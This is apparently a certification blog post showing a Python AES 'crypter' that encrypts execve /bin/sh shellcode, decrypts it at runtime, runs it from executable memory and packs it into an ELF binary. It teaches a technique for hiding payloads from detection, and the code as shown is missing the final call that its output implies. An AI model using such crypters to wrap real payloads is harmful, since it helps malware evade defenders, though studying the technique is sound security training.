SLAE 0x7 – Custom crypter

Crypters are programs that encrypt an executable/shellcode, decrypt it at runtime and then run them. So the idea is to use a key/string to encrypt the shellcode. The encrypted shellcode will then be decrypted with the same key and then run.

To understand this further we will create our custom crypter using the AES encryption algorithm. AES (Advanced Encryption Standard) is a symmetric key block algorithm. I am no crypto expert so we will be leveraging on python modules like crypto to generate our encrypted shellcode using AES in CBC mode. In a nutshell, our code basically generates a random IV (Initialization Vector) based on block size. This IV is used to create a cipher using the CBC mode. This IV and cipher together is encrypted using the encrypt function. We finally return the result in hex.

Observe we use the execve /bin/sh as shellcode to be encrypted and  “slaesecuritytube” as our key to encrypt the shellcode.

#!/usr/bin/env python

import base64
import binascii

from Crypto import Random
from Crypto.Cipher import AES

BS = 16
pad = lambda s: s + (BS – len(s) % BS) * chr(BS – len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]
class AESCipher:

def __init__(self, key):

self.key = key

def encrypt(self, raw):

raw = pad(raw)
iv = Random.new().read(AES.block_size)
cipher = AES.new( self.key, AES.MODE_CBC, iv)
return (iv + cipher.encrypt(raw)).encode(‘hex’)

cipher = AESCipher(‘slaesecuritytube’) #key is “slaesecuritytube”
#encrypt the execve shellcode
encrypted = cipher.encrypt(‘\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80’)

print “Encrypted shellcode: ” + encrypted

Lets run our python script to generate the encrypted shellcode

ddpinto@ddpinto-VirtualBox:~$ python aes_encrypter.py
Encrypted shellcode: fdadcef923a8e3da901e5ce7a14cc30c3d170418db975e1733784398ab8cab3bbbc15d070c5301ce0a4ac8c800101b37

Lets include the encrypted shellcode in our decryption routine.  Notice we have also fed the same key “slaesecuritytube” for decryption process. Once the decryption is complete the decrypted shellcode is run to give us a /bin/sh shell

#!/usr/bin/env python

import ctypes
from ctypes import CDLL, c_char_p, c_void_p, memmove, cast, CFUNCTYPE
import base64
import binascii

from Crypto import Random
from Crypto.Cipher import AES

BS = 16
pad = lambda s: s + (BS – len(s) % BS) * chr(BS – len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]

class AESCipher:

def __init__(self, key):

self.key = key

def decrypt( self, enc ):

enc = enc.decode(‘hex’)
iv = enc[:16]
cipher = AES.new(self.key, AES.MODE_CBC, iv )
return unpad(cipher.decrypt(enc[16:]))

cipher = AESCipher(‘slaesecuritytube’)
encrypted = ‘fdadcef923a8e3da901e5ce7a14cc30c3d170418db975e1733784398ab8cab3bbbc15d070c5301ce0a4ac8c800101b37’
decrypted = cipher.decrypt(encrypted).encode(‘hex’)
print “Decrypted shellcode: ” + decrypted

libc = CDLL(‘libc.so.6’)
shellcode = decrypted.decode(‘hex’)
sc = c_char_p(shellcode)
size = len(shellcode)
addr = c_void_p(libc.valloc(size))
memmove(addr, sc, size)
libc.mprotect(addr, size, 0x7)
run = cast(addr, CFUNCTYPE(c_void_p))

ddpinto@ddpinto-VirtualBox:~$ python aes_decrypter.py
Decrypted shellcode: 31c050686e2f7368682f2f626989e35089e25389e1b00bcd80
Executing Shellcode
$ id
uid=1000(ddpinto) gid=1000(ddpinto) groups=1000(ddpinto),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

We can also use pyinstaller to create a binary.

ddpinto@slae:~$ pyinstaller –onefile aes_decrypter.py
22 INFO: PyInstaller: 3.4
22 INFO: Python: 2.7.15rc1
22 INFO: Platform: Linux-4.15.0-46-generic-i686-with-Ubuntu-18.04-bionic
23 INFO: wrote /home/ddpinto/aes_decrypter.spec
30 INFO: UPX is not available.
35 INFO: Extending PYTHONPATH with paths
[‘/home/ddpinto’, ‘/home/ddpinto’]
36 INFO: checking Analysis
36 INFO: Building Analysis because Analysis-00.toc is non existent
36 INFO: Initializing module dependency graph…
37 INFO: Initializing module graph hooks…
88 INFO: running Analysis Analysis-00.toc
103 INFO: Caching module hooks…
106 INFO: Analyzing /home/ddpinto/aes_decrypter.py
1555 INFO: Loading module hooks…
1556 INFO: Loading module hook “hook-Crypto.py”…
Traceback (most recent call last):
File “<string>”, line 2, in <module>
ImportError: No module named Math
1574 INFO: Loading module hook “hook-encodings.py”…
2102 INFO: Looking for ctypes DLLs
2127 INFO: Analyzing run-time hooks …
2144 INFO: Looking for dynamic libraries
2319 INFO: Looking for eggs
2320 INFO: Python library not in binary dependencies. Doing additional searching…
2343 INFO: Using Python library /usr/lib/i386-linux-gnu/libpython2.7.so.1.0
2345 INFO: Warnings written to /home/ddpinto/build/aes_decrypter/warn-aes_decrypter.txt
2370 INFO: Graph cross-reference written to /home/ddpinto/build/aes_decrypter/xref-aes_decrypter.html
2431 INFO: checking PYZ
2431 INFO: Building PYZ because PYZ-00.toc is non existent
2432 INFO: Building PYZ (ZlibArchive) /home/ddpinto/build/aes_decrypter/PYZ-00.pyz
2699 INFO: Building PYZ (ZlibArchive) /home/ddpinto/build/aes_decrypter/PYZ-00.pyz completed successfully.
2743 INFO: checking PKG
2748 INFO: Building PKG because PKG-00.toc is non existent
2748 INFO: Building PKG (CArchive) PKG-00.pkg
3931 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
3936 INFO: Bootloader /home/ddpinto/.local/lib/python2.7/site-packages/PyInstaller/bootloader/Linux-32bit/run
3937 INFO: checking EXE
3937 INFO: Building EXE because EXE-00.toc is non existent
3937 INFO: Building EXE from EXE-00.toc
3937 INFO: Appending archive to ELF section in EXE /home/ddpinto/dist/aes_decrypter
3968 INFO: Building EXE from EXE-00.toc completed successfully.

Inside the dist directory you should find your binary

ddpinto@ddpinto-VirtualBox:~/dist$ file aes_decrypter
aes_decrypter: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=7a1cca0c1ee8066745d43b624338ea1ac36eaabf, stripped
ddpinto@ddpinto-VirtualBox:~/dist$ ./aes_decrypter
Decrypted shellcode: 31c050686e2f7368682f2f626989e35089e25389e1b00bcd80
Executing Shellcode
$

There you go! Our binary works and successfully executed a /bin/sh shell.

Github: https://github.com/buffered4ever/SLAE – 0x7

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: PA-1932

Leave a comment

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: